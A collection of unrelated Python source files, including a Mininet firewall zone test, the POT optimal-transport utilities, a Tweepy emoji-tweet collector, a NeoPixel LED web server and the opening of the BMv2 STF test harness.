test.prefix = ""
def test_inter_zone(self):
'''
Test if connections work for inter zone traffic for which
there is a policy allowing that kind of traffic and that
the don't if the policy disallows it.
'''
test.prefix = "[Inter Zone Test] "
host_dict = self.get_host_dict()
success = True
print("*** Inter Zone Test started")
#"PolicyID": 1, "Src": 1, "Dest": 2,"SrcPort": 70, "DestPort": 90, "Proto": "TCP", "Action": "forwarding"
success = success and not(test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=70, destPort=90)) # Fail because for TCP established would be needed
#"PolicyID": 2, "Src": 2, "Dest": 1, "SrcPort": 70, "DestPort": 90, "Proto": "UDP", "Action": "forwarding"
success = success and test.test_udp(src=host_dict['h13'], dest=host_dict['h11'], srcPort=70, destPort=90) # OK
#"PolicyID": 3, "Src": 1, "Dest": 2, "SrcPort": 0, "DestPort": 0, "Proto": "TCP", "Action": "forwarding"
success = success and not(test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'])) # Fail because for TCP established would be needed
#"PolicyID": 4, "Src": 3, "Dest": 0, "SrcPort": 0, "DestPort": 0, "Proto": "", "Action": "drop"
success = success and not(test.test_udp(src=host_dict['h22'], dest=host_dict['h13'])) # Fail because of drop action
success = success and not(test.test_udp(src=host_dict['h22'], dest=host_dict['h11'])) # Fail because of drop action
#"PolicyID": 5, "Src": 1, "Dest": 2, "SrcPort": 80, "DestPort": 100, "Proto": "TCP", "Action": "established"
success = success and test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=80, destPort=100) #OK
success = success and test.test_tcp(src=host_dict['h13'], dest=host_dict['h11'], srcPort=100, destPort=80) #OK
#"PolicyID": 6, "Src": 1, "Dest": 2, "SrcPort": 80, "DestPort": 0, "Proto": "TCP", "Action": "drop"
success = success and not(test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=80)) # Fail because we drop
#"PolicyID": 7, "Src": 2, "Dest": 1, "SrcPort": 0, "DestPort": 100, "Proto": "UDP", "Action": "established"
success = success and test.test_udp(src=host_dict['h13'], dest=host_dict['h12'], srcPort=123, destPort=100)
success = success and test.test_udp(src=host_dict['h12'], dest=host_dict['h13'], srcPort=100, destPort=123)
#"PolicyID": 8, "Src": 1, "Dest": 3, "SrcPort": 0, "DestPort": 0, "Proto": "", "Action": "established"
success = success and test.test_icmp(src=host_dict['h11'], dest=host_dict['h22'])
success = success and test.test_icmp(src=host_dict['h22'], dest=host_dict['h11'])
if success:
print("*** Inter Zone Test passed")
else:
print("*** Inter Zone Test failed")
test.prefix = ""
def test(self):
'''
just test only one thing
'''
test.prefix = "[Test] "
host_dict = self.get_host_dict()
#"PolicyID": 5, "Src": 1, "Dest": 2, "SrcPort": 80, "DestPort": 100, "Proto": "TCP", "Action": "established"
success = test.test_tcp(src=host_dict['h11'], dest=host_dict['h13'], srcPort=80, destPort=100) #OK
success = test.test_tcp(src=host_dict['h13'], dest=host_dict['h11'], srcPort=100, destPort=80) #OK
test.prefix = ""
def traffic_generator(self):
'''
generate some traffic for the packet-in benchmarking
'''
test.prefix = "[ICMP Traffic Generator] "
host_dict = self.get_host_dict()
while True:
t = time.time()
for i in range(9):
# 90% intra-zone
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h21']])
time.sleep(1)
for i in range(1):
# 10% mix
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h13'], host_dict['h21'], host_dict['h22']])
print("*** Time for this round was: "+str(time.time()-t)+"s")
def traffic_generator_intra_zone(self):
'''
generate intra zone traffic for benchmarking packet-in messages
'''
test.prefix = "[ICMP Traffic Generator] "
host_dict = self.get_host_dict()
while True:
t = time.time()
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h21']])
time.sleep(2)
def traffic_generator_inter_zone(self):
'''
generate inter zone traffic for benchmarking packet-in messages
'''
test.prefix = "[ICMP Traffic Generator] "
host_dict = self.get_host_dict()
while True:
t = time.time()
_ = self.net.ping([host_dict['h11'], host_dict['h12'], host_dict['h13'], host_dict['h21'], host_dict['h22']])
time.sleep(1)
def get_host_dict(self):
host_dict = {}
for host in self.hosts:
host_dict[host[0].name] = host[0]
return host_dict
def startCLI(self):
print ("*** Running CLI")
CLI( self.net )
def stopNet(self):
print ("*** Stopping network")
self.net.stop()
service.kill_processes()
if __name__ == '__main__':
setLogLevel( 'info' )
topo = EndpointTPTestbed()
topo.topology()
#Make sure that everything is ready
time.sleep(3)
try:
#topo.test_intra_zone()
#topo.test_inter_zone()
#topo.test()
#t1 = threading.Thread(target=topo.traffic_generator_inter_zone)
#t1.daemon = True
#
#t2 = threading.Thread(target=topo.traffic_generator_intra_zone)
#t2.daemon = True
#t1.start()
#t2.start()
#while True:
# pass
topo.traffic_generator_intra_zone()
topo.startCLI()
finally:
topo.stopNet()
|
testcase.py
|
import numpy as np
import subprocess as sp
from threading import Thread
n_samples = 44100
proc = sp.Popen(['cat'], stdin=sp.PIPE, stdout=sp.PIPE)
out_arr = np.ones(n_samples, dtype=np.int16)
def reader():
in_arr = np.fromfile(proc.stdout, np.int16, n_samples)
assert np.all(np.equal(in_arr, out_arr))
reader_thread = Thread(target=reader)
reader_thread.start()
out_arr.tofile(proc.stdin)
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Various function that can be usefull
"""
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import multiprocessing
from functools import reduce
import time
import numpy as np
from scipy.spatial.distance import cdist
import sys
import warnings
__time_tic_toc = time.time()
def tic():
""" Python implementation of Matlab tic() function """
global __time_tic_toc
__time_tic_toc = time.time()
def toc(message='Elapsed time : {} s'):
""" Python implementation of Matlab toc() function """
t = time.time()
print(message.format(t - __time_tic_toc))
return t - __time_tic_toc
def toq():
""" Python implementation of Julia toc() function """
t = time.time()
return t - __time_tic_toc
def kernel(x1, x2, method='gaussian', sigma=1, **kwargs):
"""Compute kernel matrix"""
if method.lower() in ['gaussian', 'gauss', 'rbf']:
K = np.exp(-dist(x1, x2) / (2 * sigma**2))
return K
def unif(n):
""" return a uniform histogram of length n (simplex)
Parameters
----------
n : int
number of bins in the histogram
Returns
-------
h : np.array (n,)
histogram of length n such that h_i=1/n for all i
"""
return np.ones((n,)) / n
def clean_zeros(a, b, M):
""" Remove all components with zeros weights in a and b
"""
M2 = M[a > 0, :][:, b > 0].copy() # copy force c style matrix (froemd)
a2 = a[a > 0]
b2 = b[b > 0]
return a2, b2, M2
def dist(x1, x2=None, metric='sqeuclidean'):
"""Compute distance between samples in x1 and x2 using function scipy.spatial.distance.cdist
Parameters
----------
x1 : np.array (n1,d)
matrix with n1 samples of size d
x2 : np.array (n2,d), optional
matrix with n2 samples of size d (if None then x2=x1)
metric : str, fun, optional
name of the metric to be computed (full list in the doc of scipy), If a string,
the distance function can be 'braycurtis', 'canberra', 'chebyshev', 'cityblock',
'correlation', 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean', 'wminkowski', 'yule'.
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
if x2 is None:
x2 = x1
return cdist(x1, x2, metric=metric)
def dist0(n, method='lin_square'):
"""Compute standard cost matrices of size (n,n) for OT problems
Parameters
----------
n : int
size of the cost matrix
method : str, optional
Type of loss matrix chosen from:
* 'lin_square' : linear sampling between 0 and n-1, quadratic loss
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
res = 0
if method == 'lin_square':
x = np.arange(n, dtype=np.float64).reshape((n, 1))
res = dist(x, x)
return res
def cost_normalization(C, norm=None):
""" Apply normalization to the loss matrix
Parameters
----------
C : np.array (n1, n2)
The cost matrix to normalize.
norm : str
type of normalization from 'median','max','log','loglog'. Any other
value do not normalize.
Returns
-------
C : np.array (n1, n2)
The input cost matrix normalized according to given norm.
"""
if norm == "median":
C /= float(np.median(C))
elif norm == "max":
C /= float(np.max(C))
elif norm == "log":
C = np.log(1 + C)
elif norm == "loglog":
C = np.log(1 + np.log(1 + C))
return C
def dots(*args):
""" dots function for multiple matrix multiply """
return reduce(np.dot, args)
def fun(f, q_in, q_out):
""" Utility function for parmap with no serializing problems """
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
""" paralell map for multiprocessing """
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
def check_params(**kwargs):
"""check_params: check whether some parameters are missing
"""
missing_params = []
check = True
for param in kwargs:
if kwargs[param] is None:
missing_params.append(param)
if len(missing_params) > 0:
print("POT - Warning: following necessary parameters are missing")
for p in missing_params:
print("\n", p)
check = False
return check
class deprecated(object):
"""Decorator to mark a function or class as deprecated.
deprecated class from scikit-learn package
https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/utils/deprecation.py
Issue a warning when the function is called/the class is instantiated and
adds a warning to the docstring.
The optional extra argument will be appended to the deprecation message
and the docstring. Note: to use this with the default value for extra, put
in an empty of parentheses:
>>> from ot.deprecation import deprecated
>>> @deprecated()
... def some_function(): pass
Parameters
----------
extra : string
to be added to the deprecation messages
"""
# Adapted from http://wiki.python.org/moin/PythonDecoratorLibrary,
# but with many changes.
def __init__(self, extra=''):
self.extra = extra
def __call__(self, obj):
"""Call method
Parameters
----------
obj : object
"""
if isinstance(obj, type):
return self._decorate_class(obj)
else:
return self._decorate_fun(obj)
def _decorate_class(self, cls):
msg = "Class %s is deprecated" % cls.__name__
if self.extra:
msg += "; %s" % self.extra
# FIXME: we should probably reset __new__ for full generality
init = cls.__init__
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return init(*args, **kwargs)
cls.__init__ = wrapped
wrapped.__name__ = '__init__'
wrapped.__doc__ = self._update_doc(init.__doc__)
wrapped.deprecated_original = init
return cls
def _decorate_fun(self, fun):
"""Decorate function fun"""
msg = "Function %s is deprecated" % fun.__name__
if self.extra:
msg += "; %s" % self.extra
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return fun(*args, **kwargs)
wrapped.__name__ = fun.__name__
wrapped.__dict__ = fun.__dict__
wrapped.__doc__ = self._update_doc(fun.__doc__)
return wrapped
def _update_doc(self, olddoc):
newdoc = "DEPRECATED"
if self.extra:
newdoc = "%s: %s" % (newdoc, self.extra)
if olddoc:
newdoc = "%s\n\n%s" % (newdoc, olddoc)
return newdoc
def _is_deprecated(func):
"""Helper to check if func is wraped by our deprecated decorator"""
if sys.version_info < (3, 5):
raise NotImplementedError("This is only available for python3.5 "
"or above")
closures = getattr(func, '__closure__', [])
if closures is None:
closures = []
is_deprecated = ('deprecated' in ''.join([c.cell_contents
for c in closures
if isinstance(c.cell_contents, str)]))
return is_deprecated
class BaseEstimator(object):
"""Base class for most objects in POT
adapted from sklearn BaseEstimator class
Notes
-----
All estimators should specify all the parameters that can be set
at the class level in their ``__init__`` as explicit keyword
arguments (no ``*args`` or ``**kwargs``).
"""
@classmethod
def _get_param_names(cls):
"""Get parameter names for the estimator"""
try:
from inspect import signature
except ImportError:
from .externals.funcsigs import signature
# fetch the constructor or the original constructor before
# deprecation wrapping if any
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
if init is object.__init__:
# No explicit constructor to introspect
return []
# introspect the constructor arguments to find the model parameters
# to represent
init_signature = signature(init)
# Consider the constructor parameters excluding 'self'
parameters = [p for p in init_signature.parameters.values()
if p.name != 'self' and p.kind != p.VAR_KEYWORD]
for p in parameters:
if p.kind == p.VAR_POSITIONAL:
raise RuntimeError("POT estimators should always "
"specify their parameters in the signature"
" of their __init__ (no varargs)."
" %s with constructor %s doesn't "
" follow this convention."
% (cls, init_signature))
# Extract and sort argument names excluding 'self'
return sorted([p.name for p in parameters])
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
out = dict()
for key in self._get_param_names():
# We need deprecation warnings to always be on in order to
# catch deprecated param values.
# This is set in utils/__init__.py but it gets overwritten
# when running under python3 somehow.
warnings.simplefilter("always", DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
# if the parameter is deprecated, don't show it
continue
finally:
warnings.filters.pop(0)
# XXX: should we rather test if instance of estimator?
if deep and hasattr(value, 'get_params'):
deep_items = value.get_params().items()
out.update((key + '__' + k, val) for k, val in deep_items)
out[key] = value
return out
def set_params(self, **params):
"""Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Returns
-------
self
"""
if not params:
# Simple optimisation to gain speed (inspect is slow)
return self
valid_params = self.get_params(deep=True)
# for key, value in iteritems(params):
for key, value in params.items():
split = key.split('__', 1)
if len(split) > 1:
# nested objects case
name, sub_name = split
if name not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(name, self))
sub_object = valid_params[name]
sub_object.set_params(**{sub_name: value})
else:
# simple objects case
if key not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(key, self.__class__.__name__))
setattr(self, key, value)
return self
|
tweet_stream.py
|
#!/usr/bin/env python3
# this is based on http://adilmoujahid.com/posts/2014/07/twitter-analytics/
import collections
import json
import html
import os
import re
import sys
import queue
import threading
import tweepy
import tweepy.api
import tweepy.streaming
conf = json.load(open(os.environ['TWITTER_CONFIG']))
access_token = conf['access']
access_token_secret = conf['access_secret']
consumer_key = conf['consumer']
consumer_secret = conf['consumer_secret']
def get_text(d):
if d.get('extended_tweet'):
d = d['extended_tweet']
t = d['full_text']
else:
t = d.get('text')
assert not t or not d['truncated']
if not t:
return
for m in d.get('entities', {}).get('media', []):
if m.get('url'):
t = t.replace(m['url'], m['expanded_url'])
for m in d.get('entities', {}).get('urls', []):
t = t.replace(m['url'], m['expanded_url'])
return t.replace('\n', '\t')
class Listener(tweepy.streaming.StreamListener):
def __init__(self, ems, rare_thresh=100):
self.f = open('tweets', 'a')
self.frol = open('/dev/shm/tweets_recent', 'a')
self.set_rare_regex(ems[rare_thresh:])
self.queue = queue.Queue(maxsize=1000000)
threading.Thread(target=self.run, daemon=True).start()
def set_rare_regex(self, ems):
self.rare_ems_re = re.compile(r'(%s)' % '|'.join(e for e in ems))
def run(self):
seen_ids = collections.OrderedDict()
n = 0
while True:
try:
data = self.queue.get(block=True)
except:
import traceback
traceback.print_exc()
if data is None:
break
try:
d = json.loads(html.unescape(data))
except json.JSONDecodeError:
open('tweets_corrupt', 'a').write(data)
d = json.loads(data)
t = get_text(d)
if not t:
print(d)
continue
if self.frol.tell() > 10e6:
self.frol.seek(0)
self.frol.truncate()
self.frol.write(data)
if d['id'] in seen_ids:
continue
if d.get('retweeted') or t.startswith('RT @'):
continue
seen_ids[d['id']] = True
if len(seen_ids) > 10000:
seen_ids.popitem(last=False)
e = [d['id'], d['timestamp_ms'], d['user']['screen_name'], t]
if self.rare_ems_re.search(t):
print('%8d' % n, *e)
print(*e, file=self.f)
n += 1
def on_data(self, data):
self.queue.put(data)
return True
def on_error(self, status):
print(status)
return False
if __name__ == '__main__':
rank = json.load(open('data/emojitracker_rankings.json'))
ems = [x['char'] for x in rank]
ems_counts = {e: 0 for e in ems}
l = Listener(ems, 200)
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
if sys.argv[-1] == 'search':
vec_have = {l.split()[0] for l in open('data/tweets_vec_emoji.txt')}
missed = [e for e in ems if e not in vec_have]
api = tweepy.API(auth)
for x in range(len(missed)):
for tw in tweepy.Cursor(api.search,
q=' OR '.join(missed[x:x + 1]) +
' -filter:replies -filter:nativeretweets',
count=100,
until='2019-06-01',
lang='en',
tweet_mode='extended').items(1500):
t = get_text(tw._json)
if not t:
continue
if not any(m in t for m in missed):
continue
e = [
tw.id,
int(tw.created_at.timestamp() * 1000), tw.user.screen_name,
t
]
print(*e)
print(*e, file=l.f)
l.f.flush()
sys.exit(0)
#a = slice(None, 20)
#a = slice(40, 70)
a = slice(40, 440)
# a = slice(50, 150) # try to collect some rarer stuff
b = slice(a.stop, a.stop + 400)
if sys.argv[-1] == 'freq':
for line in open('tweets.vocab'):
w, c = line.split(' ')
if w in ems_counts:
ems_counts[w] = int(c)
ems.sort(key=ems_counts.get)
print('monitoring', ' '.join(ems[:800]))
a = slice(0, 780, 2)
b = slice(1, 780, 2)
print(sorted(ems_counts.items(), key=lambda x: x[1])[:780])
l.set_rare_regex(ems[:400])
stream = tweepy.Stream(auth, l, tweet_mode='extended')
stream2 = tweepy.Stream(auth, l, tweet_mode='extended')
stream.filter(track=ems[a], languages=['en'], is_async=True)
stream2.filter(track=ems[b], languages=['en'], is_async=True)
|
assignment.py
|
from threading import *
class EvenNumbers:
def even(self):
self.c = Condition()
self.c.acquire()
for i in range(1,101):
if i%2==0:
print(i)
self.c.notify()
self.c.release()
class OddNumbers:
def odd(self):
self.c = Condition()
self.c.acquire()
for i in range(1,101):
if i%2==1:
print(i)
self.c.notify()
self.c.release()
e = EvenNumbers()
o = OddNumbers()
t1 = Thread(target = e.even)
t2 = Thread(target = o.odd)
t1.start()
t2.start()
'''
Someone else's Program:
from threading import *
class MyThread:
def displayEvenNumbers(self):
i = 0
while(i<=100 and i%2==0):
print(i)
i+=1
def displayOddNumbers(self):
l = 0
while(l<=100 and l%2!=0):
print(l)
l+=1
k = 0
while(k<=100):
print(k)
k+=1
obj = MyThread()
t1 = Thread(target=obj.displayEvenNumbers)
t1.start()
t2 = Thread(target=obj.displayOddNumbers)
t2.start()
'''
|
conversation.py
|
from queue import Queue, Empty
from threading import Thread
from time import sleep
from random import uniform
from personalities.sheldon import Sheldon
from personalities.generic import Generic
class ConversationStateMachine:
def __init__(self, partner_name, reply_sink, finish_hook=None, default_persona="generic"):
"""
Creates a greeting state machine that handles the greeting of a conversation by producing replies.
:param partner_name: Name of the person we're conversing with
:param reply_sink: Function to call with outgoing messages (irc privmsg probably)
:param start_state: Can either be State.outreach_reply or State.start. State.start will initiate the conversation,
while State.outreach_reply will partake in a conversation already initiated by someone else.
"""
self.sheldon = Sheldon(self.reply)
self.generic = Generic(self.reply)
self.active = self.generic if default_persona == "generic" else self.sheldon
self.conversation_partner = partner_name
self.message_queue = Queue()
self.thread = Thread(target=self.loop)
self.reply_sink = reply_sink
self.finish_hook = finish_hook
self.stopmsg = False
def stop(self):
self.stopmsg = True
def start(self, initial_message=None):
"""
Call this so start the greeting state machine
"""
if not initial_message:
self.active.initiate()
else:
self.message_queue.put(initial_message)
self.thread.start()
def incoming_message(self, message):
"""
Insert a message into the queue that should be processed by this greeting state machine.
:param message: The message to be processed
"""
self.message_queue.put(message)
def reply(self, message):
"""
Sends a reply to the person this greeting state machine is conversing with using the reply sink.
:param message: Message to be sent as a reply
"""
outgoing_message = "{}: {}".format(self.conversation_partner, message)
if not self.stopmsg:
self.reply_sink(outgoing_message)
def loop(self):
while(not self.stopmsg):
incoming_message = None
try:
incoming_message = self.message_queue.get(timeout=30)
sleep(uniform(1, 3))
except Empty:
incoming_message = None
self.active.handle_timeout()
if self.active.delegate(incoming_message):
if self.active is self.generic:
self.active = self.sheldon
else:
self.active = self.sheldon
if self.active.handle_message(incoming_message):
break
if self.finish_hook:
self.finish_hook(self.conversation_partner)
|
main.py
|
#!/usr/bin/python
from bottle import get,request, route, run, static_file,template
import time, threading
from neopixel import *
# LED strip configuration:
LED_COUNT = 32 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 20 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
# Intialize the library (must be called once before other functions).
strip.begin()
strip.show()
BRIGHTNESS_MAX = 100
rgb = 0
light_type = 'off'
@get("/")
def index():
global rgb, light_type
rgb = 0xffffff
light_type = 'off'
return static_file('index.html', './')
#网页上的静态文件需要做传输处理
@route('/<filename>')
def server_static(filename):
return static_file(filename, root='./')
#POST方式获取Ajax传输过来的rgb值
@route('/rgb', method='POST')
def rgbLight():
red = request.POST.get('red')
green = request.POST.get('green')
blue = request.POST.get('blue')
#print('red='+ red +', green='+ green +', blue='+ blue)
red = int(red)
green = int(green)
blue = int(blue)
if 0 <= red <= 255 and 0 <= green <= 255 and 0 <= blue <= 255:
global rgb
rgb = (red<<8) | (green<<16) | blue
@route('/lightType', method='POST')
def lightType():
global light_type
light_type = request.POST.get('type')
print("lightType="+light_type)
@route('/brightness', method='POST')
def brightness():
global brightness
brightness = request.POST.get('brightness')
print("brightness="+brightness)
brightness = int(brightness)
if 0 <= brightness <= BRIGHTNESS_MAX:
strip.setBrightness(brightness)
def lightLoop():
global rgb, light_type
flashTime = [0.3, 0.2, 0.1, 0.05, 0.05, 0.1, 0.2, 0.5, 0.2]
flashTimeIndex = 0
f = lambda x: (-1/10000.0)*x*x + (1/50.0)*x
x = 0
while True:
if light_type == 'off':
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, 0)
strip.show()
time.sleep(0.05)
elif light_type == 'static':
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, rgb)
strip.show()
time.sleep(0.05)
elif light_type == 'breath':
red = int(((rgb & 0x00ff00)>>8) * f(x))
green = int(((rgb & 0xff0000) >> 16) * f(x))
blue = int((rgb & 0x0000ff) * f(x))
_rgb = int((red << 8) | (green << 16) | blue)
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, _rgb)
strip.show()
time.sleep(0.02)
x += 1
if x >= 200:
x = 0
elif light_type == 'flash': #呼吸灯显示
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, rgb)
strip.show()
time.sleep(flashTime[flashTimeIndex])
for i in range(0,strip.numPixels()):
strip.setPixelColor(i, 0)
strip.show()
time.sleep(flashTime[flashTimeIndex])
flashTimeIndex += 1
if flashTimeIndex >= len(flashTime):
flashTimeIndex = 0
t = threading.Thread(target = lightLoop)
t.setDaemon(True)
t.start()
run(host="0.0.0.0", port=80)
|
bmv2stf.py
|
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the BMv2 behavioral model simulator with input from an stf file
from __future__ import print_function
from subprocess import Popen
from threading import Thread
from glob import glob
import json
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import signal
import time
import random
import errno
import socket
from string import maketrans
from collections import OrderedDict
try:
from scapy.layers.all import *
from scapy.utils import *
except ImportError:
pass
SUCCESS = 0
FAILURE = 1
class TimeoutException(Exception): pass
def signal_handler(signum, frame):
raise TimeoutException, "Timed out!"
signal.signal(signal.SIGALRM, signal_handler)
class Options(object):
def __init__(self):
self.binary = None
self.verbose = False
self.preserveTmp = False
self.observationLog = None
self.usePsa = False
def nextWord(text, sep = None):
# Split a text at the indicated separator.
# Note that the separator can be a string.
# Separator is discarded.
spl = text.split(sep, 1)
if len(spl) == 0:
return '', ''
elif len(spl) == 1:
return spl[0].strip(), ''
else:
return spl[0].strip(), spl[1].strip()
def ByteToHex(byteStr):
return ''.join( [ "%02X " % ord( x ) for x in byteStr ] ).strip()
def HexToByte(hexStr):
bytes = []
hexStr = ''.join( hexStr.split(" ") )
for i in range(0, len(hexStr), 2):
bytes.append( chr( int (hexStr[i:i+2], 16 ) ) )
return ''.join( bytes )
def reportError(*message):
print("***", *message)
class Local(object):
# object to hold local vars accessable to nested functions
pass
def FindExe(dirname, exe):
dir = os.getcwd()
while len(dir) > 1:
if os.path.isdir(os.path.join(dir, dirname)):
rv = None
rv_time = 0
for dName, sdName, fList in os.walk(os.path.join(dir, dirname)):
if exe in fList:
n=os.path.join(dName, exe)
if os.path.isfile(n) and os.access(n, os.X_OK):
n_time = os.path.getmtime(n)
if n_time > rv_time:
rv = n
rv_time = n_time
if rv is not None:
return rv
dir = os.path.dirname(dir)
return exe
def run_timeout(verbose, args, timeout, stderr):
if verbose:
print("Executing ", " ".join(args))
local = Local()
local.process = None
def target():
procstderr = None
if stderr is not None:
procstderr = open(stderr, "w")
local.process = Popen(args, stderr=procstderr)
local.process.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
reportError("Process failed to start")
return -1
if verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
class ConcurrentInteger(object):
# Generates exclusive integers in a range 0-max
# in a way which is safe across multiple processes.
# It uses a simple form of locking using folder names.
# This is necessary because this script may be invoked
# concurrently many times by make, and we need the many simulator instances
# to use different port numbers.
def __init__(self, folder, max):
self.folder = folder
self.max = max
def lockName(self, value):
return "lock_" + str(value)
def release(self, value):
os.rmdir(self.lockName(value))
def generate(self):
# try 10 times
for i in range(0, 10):
index = random.randint(0, self.max)
file = self.lockName(index)
try:
os.makedirs(file)
return index
except:
time.sleep(1)
continue
return None
class BMV2ActionArg(object):
def __init__(self, name, width):
# assert isinstance(name, str)
# assert isinstance(width, int)
self.name = name
self.width = width
class TableKey(object):
def __init__(self):
self.fields = OrderedDict()
def append(self, name, type):
self.fields[name] = type
class TableKeyInstance(object):
def __init__(self, tableKey):
assert isinstance(tableKey, TableKey)
self.values = {}
self.key = tableKey
for f,t in tableKey.fields.iteritems():
if t == "ternary":
self.values[f] = "0&&&0"
elif t == "lpm":
self.values[f] = "0/0"
elif t == "exact":
self.values[f] = "0"
elif t == "valid":
self.values[f] = "0"
else:
raise Exception("Unexpected key type " + t)
def set(self, key, value):
array = re.compile("(.*)\$([0-9]+)(.*)");
m = array.match(key)
if m:
key = m.group(1) + "[" + m.group(2) + "]" + m.group(3)
found = False
if key in self.key.fields:
found = True
elif key + '$' in self.key.fields:
key = key + '$'
found = True
elif key + '.$valid$' in self.key.fields:
key = key + '.$valid$'
found = True
elif key.endswith(".valid"):
alt = key[:-5] + "$valid$"
if alt in self.key.fields:
key = alt
found = True
if not found:
for i in self.key.fields:
if i.endswith("." + key) or i.endswith("." + key + "$"):
key = i
found = True
elif key == "valid" and i.endswith(".$valid$"):
key = i
found = True
if not found and key == "valid" and "$valid$" in self.key.fields:
key = "$valid$"
found = True
if not found:
raise Exception("Unexpected key field " + key)
if self.key.fields[key] == "ternary":
self.values[key] = self.makeMask(value)
elif self.key.fields[key] == "lpm":
self.values[key] = self.makeLpm(value)
else:
self.values[key] = value
def makeMask(self, value):
# TODO -- we really need to know the size of the key to make the mask properly,
# but to find that, we need to parse the headers and header_types from the json
if value.startswith("0x"):
mask = "F"
value = value[2:]
prefix = "0x"
elif value.startswith("0b"):
mask = "1"
value = value[2:]
prefix = "0b"
elif value.startswith("0o"):
mask = "7"
value = value[2:]
prefix = "0o"
else:
raise Exception("Decimal value "+value+" not supported for ternary key")
return value
values = "0123456789abcdefABCDEF*"
replacements = (mask * 22) + "0"
trans = maketrans(values, replacements)
m = value.translate(trans)
return prefix + value.replace("*", "0") + "&&&" + prefix + m
def makeLpm(self, value):
if value.find('/') >= 0:
return value
if value.startswith("0x"):
bits_per_digit = 4
elif value.startswith("0b"):
bits_per_digit = 1
elif value.startswith("0o"):
bits_per_digit = 3
else:
value = "0x" + hex(int(value))
bits_per_digit = 4
digits = len(value) - 2 - value.count('*')
return value.replace('*', '0') + "/" + str(digits*bits_per_digit)
def __str__(self):
result = ""
for f in self.key.fields:
if result != "":
result += " "
result += self.values[f]
return result
class BMV2ActionArguments(object):
def __init__(self, action):
assert isinstance(action, BMV2Action)
self.action = action
self.values = {}
def set(self, key, value):
found = False
for i in self.action.args:
if key == i.name:
found = True
if not found:
raise Exception("Unexpected action arg " + key)
self.values[key] = value
def __str__(self):
result = ""
for f in self.action.args:
if result != "":
result += " "
result += self.values[f.name]
return result
def size(self):
return len(self.action.args)
class BMV2Action(object):
def __init__(self, jsonAction):
self.name = jsonAction["name"]
self.args = []
for a in jsonAction["runtime_data"]:
arg = BMV2ActionArg(a["name"], a["bitwidth"])
self.args.append(arg)
def __str__(self):
return self.name
def makeArgsInstance(self):
return BMV2ActionArguments(self)
class BMV2Table(object):
def __init__(self, jsonTable):
self.match_type = jsonTable["match_type"]
self.name = jsonTable["name"]
self.key = TableKey()
self.actions = {}
for k in jsonTable["key"]:
name = k["target"]
if isinstance(name, list):
name = ""
for t in k["target"]:
if name != "":
name += "."
name += t
self.key.append(name, k["match_type"])
actions = jsonTable["actions"]
action_ids = jsonTable["action_ids"]
